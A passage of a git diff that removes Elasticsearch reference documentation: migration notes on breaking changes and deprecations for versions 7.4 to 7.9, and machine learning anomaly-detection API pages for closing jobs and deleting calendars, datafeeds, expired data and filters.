the `processors` setting -is deprecated, and will be removed in version 8.0.0. Instead, use -`node.processors`. - -[discrete] -[[breaking_74_transform_changes]] -=== {transform-cap} changes - -[discrete] -[[transform_stats_format]] -==== Stats response format changes - -The response format of the <> is very different -to previous versions: - -- `task_state` and `indexer_state` are combined into a single `state` field - that replaces the old `state` object. -- Within the `checkpointing` object, `current` is renamed to `last` and - `in_progress` to `next`. -- The `checkpoint` number is now nested under `last` and `next`. -- `checkpoint_progress` is now reported in an object nested in the `next` - checkpoint object. (If there is no `next` checkpoint then no checkpoint is - in progress and by definition the `last` checkpoint is 100% complete.) - -For an example of the new format see <>. - -[discrete] -[[breaking_74_df_analytics_changes]] -=== {dfanalytics-cap} changes - -[discrete] -[[progress_reporting_change]] -==== Changes to progress reporting - -The single integer `progress_percent` field at the top level of the -{dfanalytics-job} stats is replaced by a `progress` field that is an array -of objects. Each object contains the `phase` name and `progress_percent` of one -phase of the analytics. For example: - -[source,js] ----- -{ - "id" : "my_job", - "state" : "analyzing", - "progress" : [ - { - "phase" : "reindexing", - "progress_percent" : 100 - }, - { - "phase" : "loading_data", - "progress_percent" : 100 - }, - { - "phase" : "analyzing", - "progress_percent" : 47 - }, - { - "phase" : "writing_results", - "progress_percent" : 0 - } - ] -} ----- -// NOTCONSOLE diff --git a/docs/reference/migration/migrate_7_5.asciidoc b/docs/reference/migration/migrate_7_5.asciidoc deleted file mode 100644 index 7db1961f86d..00000000000 --- a/docs/reference/migration/migrate_7_5.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[breaking-changes-7.5]] -== Breaking changes in 7.5 -++++ -7.5 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.5. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -//end::notable-breaking-changes[] - -[discrete] -[[breaking_75_search_changes]] -=== Search Changes - -[discrete] -==== Stricter checking for wildcard queries on _index -Previously, a wildcard query on the `_index` field matched directly against the -fully-qualified index name. Now, in order to match against remote indices like -`cluster:index`, the query must contain a colon, as in `cl*ster:inde*`. This -behavior aligns with the way indices are matched in the search endpoint. diff --git a/docs/reference/migration/migrate_7_6.asciidoc b/docs/reference/migration/migrate_7_6.asciidoc deleted file mode 100644 index 7c82fb271a3..00000000000 --- a/docs/reference/migration/migrate_7_6.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[breaking-changes-7.6]] -== Breaking changes in 7.6 -++++ -7.6 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.6. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_76_security_changes]] -=== Security changes - -[discrete] -==== {es} API key privileges - -If you use an API key to create another API key (sometimes called a -_derived key_), its behavior is impacted by the fix for -https://www.elastic.co/community/security[CVE-2020-7009]. - -When you make a request to create API keys, you can specify an expiration and -privileges for the API key. Previously, when you created a derived key, it had -no privileges. This behavior disregarded any privileges that you specified in -the {ref}/security-api-create-api-key.html[create API key API]. - -As of 7.6.2, this behavior changes. To create a derived key, you must explicitly -specify a role descriptor with no privileges: - -[source,js] ----- -... -"role_descriptors": { - "no-privilege": { - } -} -... ----- -// NOTCONSOLE - -//end::notable-breaking-changes[] - -[discrete] -[[breaking_76_search_changes]] -=== Search changes - -[discrete] -==== Aggregating and sorting on `_id` is deprecated -It's possible to aggregate and sort on the built-in `_id` field by loading an -expensive data structure called fielddata. This was deprecated in 7.6 and will -be disallowed by default in 8.0. As an alternative, the `_id` field's contents -can be duplicated into another field with docvalues enabled (note that this -does not apply to auto-generated IDs). - -[discrete] -==== Deprecation of sparse vector fields -The `sparse_vector` field type has been deprecated and will be removed in 8.0. -We have not seen much interest in this experimental field type, and don't see -a clear use case as it's currently designed. If you have feedback or -suggestions around sparse vector functionality, please let us know through -GitHub or the 'discuss' forums. - -[discrete] -==== Update to vector function signatures -The vector functions of the form `function(query, doc['field'])` are -deprecated, and the form `function(query, 'field')` should be used instead. -For example, `cosineSimilarity(query, doc['field'])` is replaced by -`cosineSimilarity(query, 'field')`. - -[discrete] -==== Disallow use of the `nGram` and `edgeNGram` tokenizer names - -The `nGram` and `edgeNGram` tokenizer names haven been deprecated with 7.6. -Mappings for indices created after 7.6 will continue to work but emit a -deprecation warning. The tokenizer name should be changed to the fully -equivalent `ngram` or `edge_ngram` names for new indices and in index -templates. diff --git a/docs/reference/migration/migrate_7_7.asciidoc b/docs/reference/migration/migrate_7_7.asciidoc deleted file mode 100644 index 33d18eaf4d3..00000000000 --- a/docs/reference/migration/migrate_7_7.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[breaking-changes-7.7]] -== Breaking changes in 7.7 -++++ -7.7 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.7. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_77_logging_changes]] -=== Logging changes - -[discrete] -==== Loggers under `org.elasticsearch.action` now log at `INFO` level by default - -The default log level for most loggers is `INFO`, but in earlier versions -loggers in the `org.elasticsearch.action.*` hierarchy emitted log messages at -`DEBUG` level by default. This sometimes resulted in a good deal of unnecessary -log noise. From 7.7 onwards the default log level for logger in this hierarchy -is now `INFO`, in line with most other loggers. If needed, you can recover the -pre-7.7 default behaviour by adjusting your {ref}/logging.html[logging]. - -[discrete] -[[breaking_77_mapping_changes]] -=== Mapping changes - -[discrete] -[[stricter-mapping-validation]] -==== Validation for dynamic templates - -So far misconfiguration of dynamic templates have been discovered when indexing -a document with an unmapped field only. In {es} 8.0 and later versions, dynamic mappings -have stricter validation, done at mapping update time. Invalid updates, such as using -incorrect analyzer settings or unknown field types, fail. For -indices created in {es} 7.7 and later version, the update succeeds but emits a warning. - - -[discrete] -[[breaking_77_settings_changes]] -=== Settings changes - -[discrete] -[[deprecate-listener-thread-pool]] -==== `thread_pool.listener.size` and `thread_pool.listener.queue_size` have been deprecated -The listener thread pool is no longer used internally by Elasticsearch. -Therefore, these settings have been deprecated. You can safely remove these -settings from the configuration of your nodes. - -[discrete] -[[deprecate-cluster-remote-connect]] -==== `cluster.remote.connect` is deprecated in favor of `node.remote_cluster_client` -Previously the setting `cluster.remote.connect` was used to configure whether or -not the local node is capable of acting as a remote cluster client in -cross-cluster search and cross-cluster replication. This setting is deprecated -in favor of `node.remote_cluster_client` serves the same purpose and identifies -the local node as having the `remote_cluster_client` role. - -[discrete] -[[deprecate-missing-realm-order]] -==== Authentication realm `order` will be a required config in version 8.0.0. - -The `order` config will be required in version 8.0.0 for authentication realm -configuration of any type. If the `order` config is missing for a realm, the node -will fail to start. - -[discrete] -[[deprecate-duplicated-realm-orders]] -==== Authentication realm `order` uniqueness will be enforced in version 8.0.0. - -The `order` config of authentication realms must be unique in version 8.0.0. -If you configure more than one realm of any type with the same order, the node will fail to start. - -[discrete] -[[deprecate-insecure-monitoring-password]] -==== Deprecation of insecure monitoring password setting - -The `auth.password` setting for the monitoring HTTP exporter has been deprecated and will be -removed in version 8.0.0. Please use the `auth.secure_password` setting instead. - -[discrete] -[[breaking_77_search_changes]] -=== Search changes - -[discrete] -==== Consistent rounding of range queries on `date_range` fields -`range` queries on `date_range` field currently can have slightly differently -boundaries than their equivalent query on a pure `date` field. This can e.g. -happen when using date math or dates that don't specify up to the last -millisecond. While queries on `date` field round up to the latest millisecond -for `gt` and `lte` boundaries, the same queries on `date_range` fields didn't -do this. The behavior is now the same for both field types like documented in -{ref}/query-dsl-range-query.html#range-query-date-math-rounding[Date math and rounding]. - -[discrete] -==== Pipeline aggregation validation errors -The pipeline aggregation validation has been moved to the coordinating node. -Those errors that used to return HTTP 500s/Internal Server Errors now return -400/Bad Request and we now return a list of validation errors rather than the -first one we encounter. - -[discrete] -[[breaking_77_highlighters_changes]] -=== Highlighters changes - -[discrete] -==== Ignored keyword values are no longer highlighted -If a keyword value was ignored during indexing because of its length -(`ignore_above` parameter was applied), {es} doesn't attempt to -highlight it anymore, which means no highlights are produced for -ignored values. -//end::notable-breaking-changes[] diff --git a/docs/reference/migration/migrate_7_8.asciidoc b/docs/reference/migration/migrate_7_8.asciidoc deleted file mode 100644 index d38852b327a..00000000000 --- a/docs/reference/migration/migrate_7_8.asciidoc +++ /dev/null @@ -1,214 +0,0 @@ -[[breaking-changes-7.8]] -== Breaking changes in 7.8 -++++ -7.8 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to {es} 7.8. - -See also <> and <>. - -* <> -* <> -* <> -* <> - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -[discrete] -[[breaking_781_license_changes]] -=== License Information changes - -As of the `7.8.1` release - -.Displays Enterprise license as Platinum in /_xpack -[%collapsible] -==== -*Details* -The `GET /_license` endpoint displays Enterprise licenses as -Platinum by default so that old clients (including Beats, Kibana and -Logstash) know to interpret this new license type as if it were a -Platinum license. - -This compatibility layer was not applied to the `GET /_xpack/` -endpoint, which also displays a license type and mode. {es-pull}58217[#58217] -==== - - -[discrete] -[[breaking_78_aggregation_changes]] -=== Aggregation changes - -.Privilege `indices:admin/create` will no longer allow the auto creation of indices -[%collapsible] -==== -*Details* -The privilege named `indices:admin/create` will no longer allow the auto -creation of indices. Use `create_index` instead. {es-pull}55858[#55858] -==== - -.`value_count` aggregation optimization -[%collapsible] -==== -*Details* -Scripts used in `value_count` will now receive a number if they are -counting a numeric field and a `GeoPoint` if they are counting a -`geo_point` fields. They used to always receive the `String` -representation of those values. {es-pull}54854[#54854] -==== - -[discrete] -[[breaking_78_mappings_changes]] -=== Mappings changes - -[[prevent-enabled-setting-change]] -.The `enabled` mapping parameter cannot be changed for a root mapping. -[%collapsible] -==== -*Details* + -Mapping requests that attempt to change the {ref}/enabled.html[`enabled`] -mapping parameter for a root mapping will fail and return an error. - -Previously, {es} accepted mapping requests that attempted to change the -`enabled` parameter of the root mapping. Theses changes were not applied, but -such requests didn't return an error. - -*Impact* + -To avoid errors, do not submit mapping requests that change the -{ref}/enabled.html[`enabled`] mapping parameter. -==== - -[[prevent-include-in-root-change]] -.The `include_in_parent` and `include_in_root` mapping parameters cannot be changed for `nested` fields. -[%collapsible] -==== -*Details* + -Mapping requests that attempt to change the -{ref}/nested.html#nested-include-in-parent-parm[`include_in_parent`] or -{ref}/nested.html#nested-include-in-root-parm[`include_in_root`] mapping -parameter for a `nested` field will fail and return an error. - -Previously, {es} accepted mapping requests that attempted to change the -`include_in_parent` or `include_in_root` parameter. Theses changes were not -applied, but such requests didn't return an error. - -*Impact* + -To avoid errors, do not submit mapping requests that change the -{ref}/nested.html#nested-include-in-parent-parm[`include_in_parent`] or -{ref}/nested.html#nested-include-in-root-parm[`include_in_root`] mapping -parameter. -==== - -.The get field mapping API's `local` query parameter is deprecated. -[%collapsible] -==== -*Details* + -The {ref}/indices-get-field-mapping.html[get field mapping API]'s `local` query -parameter is deprecated and will be removed in {es} 8.0.0. - -The `local` parameter is a no-op. The API always retrieves field mappings -locally. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `local` parameter. -==== - -[discrete] -[[breaking_78_settings_changes]] -=== Settings changes - -[[deprecate-node-local-storage]] -.The `node.local_storage` setting is deprecated. -[%collapsible] -==== -*Details* + -The `node.local_storage` setting is deprecated. In {es} 8.0.0, all nodes require -local storage. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `node.local_storage` -setting. -==== - -[[deprecate-basic-license-feature-enabled]] - -.Several {xpack} settings no longer have any effect and are deprecated. - -[%collapsible] -==== -*Details* + -Basic {xpack} license features are always enabled for the {default-dist} -and the following settings no longer have any effect: - -* `xpack.enrich.enabled` -* `xpack.flattened.enabled` -* `xpack.ilm.enabled` -* `xpack.monitoring.enabled` -* `xpack.rollup.enabled` -* `xpack.slm.enabled` -* `xpack.sql.enabled` -* `xpack.transform.enabled` -* `xpack.vectors.enabled` - -Previously, they could be set to `false` to disable the feature's APIs in a cluster. - -*Impact* + -To avoid deprecation warnings, discontinue use of these settings. -If you have disabled ILM so that you can use another tool to manage Watcher -indices, the newly introduced `xpack.watcher.use_ilm_index_management` setting -may be set to false. -==== - -[discrete] -[[builtin-users-changes]] -==== Changes to built-in users - -.The `kibana` user has been deprecated in favor of the `kibana_system` user. -[%collapsible] -==== -*Details* + -The `kibana` user was historically used to authenticate {kib} to {es}. -The name of this user was confusing, and was often mistakenly used to login to {kib}. -We've replaced the `kibana` user with the `kibana_system` user to reduce -confusion and to better align with other built-in system accounts. - -*Impact* + -If your `kibana.yml` used to contain: -[source,yaml] --------------------------------------------------- -elasticsearch.username: kibana --------------------------------------------------- - -then you should update to use the new `kibana_system` user instead: -[source,yaml] --------------------------------------------------- -elasticsearch.username: kibana_system --------------------------------------------------- - -IMPORTANT: The new `kibana_system` user does not preserve the previous `kibana` -user password. You must explicitly set a password for the `kibana_system` user. -==== - - -[discrete] -[[builtin-roles-changes]] -==== Changes to built-in roles - -.The `kibana_user` role has been deprecated in favor of the `kibana_admin` role. -[%collapsible] -==== -*Details* + -Users who were previously assigned the `kibana_user` role should instead be assigned -the `kibana_admin` role. This role grants the same set of privileges as `kibana_user`, but has been -renamed to better reflect its intended use. - -*Impact* + -Assign users with the `kibana_user` role to the `kibana_admin` role. -Discontinue use of the `kibana_user` role. -==== - -//end::notable-breaking-changes[] diff --git a/docs/reference/migration/migrate_7_9.asciidoc b/docs/reference/migration/migrate_7_9.asciidoc deleted file mode 100644 index 2e4bf4c17b9..00000000000 --- a/docs/reference/migration/migrate_7_9.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[[breaking-changes-7.9]] -== Breaking changes in 7.9 -++++ -7.9 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to {es} 7.9. - -See also <> and <>. - -* <> -* <> -* <> - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_79_indices_changes]] -=== Indices changes -.{es} includes built-in index templates for `logs-*-*` and `metrics-*-*`. - -[%collapsible] -==== -*Details* + -In 7.9, {es} added built-in index templates for the `metrics-*-*` and -`logs-*-*` index patterns, each with a priority of `100`. -{ingest-guide}/ingest-management-overview.html[{agent}] uses these templates to -create data streams. - -*Impact* + -If you use {agent}, assign your index templates a priority -lower than `100` to avoid overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to use a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== -//end::notable-breaking-changes[] - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_79_script_cache_changes]] -=== Script cache changes -[[deprecate_general_script_cache_size]] -.The `script.cache.max_size` setting is deprecated. - -[%collapsible] -==== -*Details* + -The `script.cache.max_size` setting is deprecated. In {es} 8.0.0, this is -set per-context. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `script.cache.max_size` -setting. You may use `script.context.$CONTEXT.cache_max_size` for the particular context. -For example, for the `ingest` context, use `script.context.ingest.cache_max_size`. - -==== - -[discrete] -[[deprecate_general_script_expire]] -.The `script.cache.expire` setting is deprecated. - -[%collapsible] -==== -*Details* + -The `script.cache.expire` setting is deprecated. In {es} 8.0.0, this is -set per-context. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `script.cache.expire` -setting. You may use `script.context.$CONTEXT.cache_expire` for the particular context. -For example, for the `update` context, use `script.context.update.cache_expire`. - -==== - -[discrete] -[[deprecate_general_script_compile_rate]] -.The `script.max_compilations_rate` setting is deprecated. - -[%collapsible] -==== -*Details* + -The `script.max_compilations_rate` setting is deprecated. In {es} 8.0.0, this is -set per-context. - -*Impact* + -To avoid deprecation warnings, discontinue use of the `script.max_compilations_rate` -setting. You may use `script.context.$CONTEXT.max_compilations_rate` for the particular -context. For example, for the `processor_conditional` context, use -`script.context.processor_conditional.max_compilations_rate`. - -==== - -[discrete] -[[deprecate_mapping_updates_for_ingest_privileges]] -.Mapping actions have been deprecated for the `create_doc`, `create`, `index` and `write` privileges. -[%collapsible] -==== -*Details* + -In {es} 8.0.0, the following privileges will no longer allow users to -explicitly update the mapping of an index: - -* `create_doc` -* `create` -* `index` -* `write` - -Additionally, in {es} 8.0.0, the following privileges will no longer allow users to -{ref}/dynamic-mapping.html[dynamically update the mapping] of an index -during indexing or ingest: - -* `create_doc` -* `create` -* `index` - -These privileges will continue to allow mapping actions on indices (but not on data streams) until -{es} 8.0.0. However, deprecation warnings will be returned. - -*Impact* + -To allow users to explicitly update the mapping of an index, -grant the `manage` privilege. - -To dynamically update the mapping of an index during indexing or -ingest, grant the `auto_configure` privilege and use index templates. This lets -you dynamically update the index mapping based on the template's mapping configuration. -==== - -[discrete] -[[breaking_79_settings_changes]] -=== Settings changes - -[[deprecate_auto_import_dangling_indices]] -.Automatically importing dangling indices is disabled by default. - -[%collapsible] -==== -*Details* + -Automatically importing <> into the cluster -is unsafe and is now disabled by default. This feature will be removed entirely -in {es} 8.0.0. - -*Impact* + -Use the <> to list, delete or import -any dangling indices manually. - -Alternatively you can enable automatic imports of dangling indices, recovering -the unsafe behaviour of earlier versions, by setting -`gateway.auto_import_dangling_indices` to `true`. This setting is deprecated -and will be removed in {es} 8.0.0. We do not recommend using this setting. - -==== -//end::notable-breaking-changes[] diff --git a/docs/reference/migration/migration.asciidoc b/docs/reference/migration/migration.asciidoc deleted file mode 100644 index bf46b3b5a5b..00000000000 --- a/docs/reference/migration/migration.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[migration-api]] -== Migration APIs - -The migration APIs simplify upgrading {xpack} indices from one version to another. - -* <> - -include::apis/deprecation.asciidoc[] diff --git a/docs/reference/ml/anomaly-detection/apis/close-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/close-job.asciidoc deleted file mode 100644 index 1fa767da583..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/close-job.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-close-job]] -= Close {anomaly-jobs} API -++++ -Close jobs -++++ - -Closes one or more {anomaly-jobs}. -A job can be opened and closed multiple times throughout its lifecycle. - -A closed job cannot receive data or perform analysis -operations, but you can still explore and navigate results. - -[[ml-close-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_close` + - -`POST _ml/anomaly_detectors/,/_close` + - -`POST _ml/anomaly_detectors/_all/_close` + - -[[ml-close-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. -* Before you can close an {anomaly-job}, you must stop its {dfeed}. See -<>. - -[[ml-close-job-desc]] -== {api-description-title} - -You can close multiple {anomaly-jobs} in a single API request by using a group -name, a comma-separated list of jobs, or a wildcard expression. You can close -all jobs by using `_all` or by specifying `*` as the ``. - -When you close a job, it runs housekeeping tasks such as pruning the model history, -flushing buffers, calculating final results and persisting the model snapshots. -Depending upon the size of the job, it could take several minutes to close and -the equivalent time to re-open. - -After it is closed, the job has a minimal overhead on the cluster except for -maintaining its meta data. Therefore it is a best practice to close jobs that -are no longer required to process data. - -When a {dfeed} that has a specified end date stops, it automatically closes -the job. - -NOTE: If you use the `force` query parameter, the request returns without performing -the associated actions such as flushing buffers and persisting the model snapshots. -Therefore, do not use this parameter if you want the job to be in a consistent state -after the close job API returns. The `force` query parameter should only be used in -situations where the job has already failed, or where you are not interested in -results the job might have recently produced or might produce in the future. - -[[ml-close-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-wildcard] - -[[ml-close-job-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -`force`:: -(Optional, Boolean) Use to close a failed job, or to forcefully close a job -which has not responded to its initial close request. - -`timeout`:: -(Optional, <>) Controls the time to wait until a job -has closed. The default value is 30 minutes. - -[[ml-close-job-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-close-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/low_request_rate/_close --------------------------------------------------- -// TEST[skip:sometimes fails due to https://github.com/elastic/elasticsearch/pull/48583#issuecomment-552991325 - on unmuting use setup:server_metrics_openjob-raw] - -When the job is closed, you receive the following results: - -[source,console-result] ----- -{ - "closed": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc deleted file mode 100644 index 04120ff327f..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-calendar-event]] -= Delete events from calendar API -++++ -Delete events from calendar -++++ - -Deletes scheduled events from a calendar. - -[[ml-delete-calendar-event-request]] -== {api-request-title} - -`DELETE _ml/calendars//events/` - -[[ml-delete-calendar-event-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-calendar-event-desc]] -== {api-description-title} - -This API removes individual events from a calendar. To remove all scheduled -events and delete the calendar, see the -<>. - -[[ml-delete-calendar-event-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -``:: -(Required, string) Identifier for the scheduled event. You can obtain this -identifier by using the <>. - -[[ml-delete-calendar-event-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/calendars/planned-outages/events/LS8LJGEBMTCMA-qz49st --------------------------------------------------- -// TEST[skip:catch:missing] - -When the event is removed, you receive the following results: -[source,js] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-calendar-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-calendar-job.asciidoc deleted file mode 100644 index d16a742e5dc..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-calendar-job.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-calendar-job]] -= Delete {anomaly-jobs} from calendar API -++++ -Delete jobs from calendar -++++ - -Deletes {anomaly-jobs} from a calendar. - -[[ml-delete-calendar-job-request]] -== {api-request-title} - -`DELETE _ml/calendars//jobs/` - -[[ml-delete-calendar-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-calendar-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-list] - -[[ml-delete-calendar-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/calendars/planned-outages/jobs/total-requests --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addjob] - -When the job is removed from the calendar, you receive the following -results: - -[source,console-result] ----- -{ - "calendar_id": "planned-outages", - "job_ids": [] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-calendar.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-calendar.asciidoc deleted file mode 100644 index 388ec663772..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-calendar.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-calendar]] -= Delete calendars API -++++ -Delete calendars -++++ - -Deletes a calendar. - -[[ml-delete-calendar-request]] -== {api-request-title} - -`DELETE _ml/calendars/` - -[[ml-delete-calendar-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-calendar-desc]] -== {api-description-title} - -This API removes all scheduled events from the calendar then deletes the -calendar. - -[[ml-delete-calendar-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-delete-calendar-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/calendars/planned-outages --------------------------------------------------- -// TEST[skip:setup:calendar_outages] - -When the calendar is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-datafeed.asciidoc deleted file mode 100644 index 38c6dcd2ab9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-datafeed.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-datafeed]] -= Delete {dfeeds} API - -[subs="attributes"] -++++ -Delete {dfeeds} -++++ - -Deletes an existing {dfeed}. - -[[ml-delete-datafeed-request]] -== {api-request-title} - -`DELETE _ml/datafeeds/` - -[[ml-delete-datafeed-prereqs]] -== {api-prereq-title} - -* Unless you use the `force` parameter, you must stop the {dfeed} before you -can delete it. -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[ml-delete-datafeed-query-parms]] -== {api-query-parms-title} - -`force`:: - (Optional, Boolean) Use to forcefully delete a started {dfeed}; this method is - quicker than stopping and deleting the {dfeed}. - -[[ml-delete-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/datafeeds/datafeed-total-requests --------------------------------------------------- -// TEST[skip:setup:server_metrics_datafeed] - -When the {dfeed} is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-expired-data.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-expired-data.asciidoc deleted file mode 100644 index bfe45e4c27b..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-expired-data.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-expired-data]] -= Delete expired data API -++++ -Delete expired data -++++ - -Deletes expired and unused machine learning data. - -[[ml-delete-expired-data-request]] -== {api-request-title} - -`DELETE _ml/_delete_expired_data` + - -`DELETE _ml/_delete_expired_data/` - -[[ml-delete-expired-data-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-expired-data-desc]] -== {api-description-title} - -Deletes all job results, model snapshots and forecast data that have exceeded -their `retention days` period. Machine learning state documents that are not -associated with any job are also deleted. - -You can limit the request to a single or set of {anomaly-jobs} by using a job identifier, -a group name, a comma-separated list of jobs, or a wildcard expression. -You can delete expired data for all {anomaly-jobs} by using `_all`, by specifying -`*` as the ``, or by omitting the ``. - -[[ml-delete-expired-data-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -Identifier for an {anomaly-job}. It can be a job identifier, a group name, or a -wildcard expression. - -[[ml-delete-expired-data-request-body]] -== {api-request-body-title} - -`requests_per_second`:: -(Optional, float) The desired requests per second for the deletion processes. -The default behavior is no throttling. - -`timeout`:: -(Optional, string) How long can the underlying delete processes run until they are canceled. -The default value is `8h` (8 hours). - -[[ml-delete-expired-data-example]] -== {api-examples-title} - -The endpoint takes no arguments: - -[source,console] --------------------------------------------------- -DELETE _ml/_delete_expired_data --------------------------------------------------- -// TEST - -When the expired data is deleted, you receive the following response: - -[source,console-result] ----- -{ - "deleted": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/delete-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/delete-filter.asciidoc deleted file mode 100644 index 94431a2f3e1..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/delete-filter.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-delete-filter]] -= Delete filters API -++++ -Delete filters -++++ - -Deletes a filter. - -[[ml-delete-filter-request]] -== {api-request-title} - -`DELETE _ml/filters/` - -[[ml-delete-filter-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-delete-filter-desc]] -== {api-description-title} - -This API deletes a {ml-docs}/ml-rules.html[filter]. -If a {ml} job references the filter, you cannot delete the filter. You must -update or delete the job before you can delete the filter. - -[[ml-delete-filter-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -[[ml-delete-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -DELETE _ml/filters/safe_domains --------------------------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -When the filter is deleted, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- 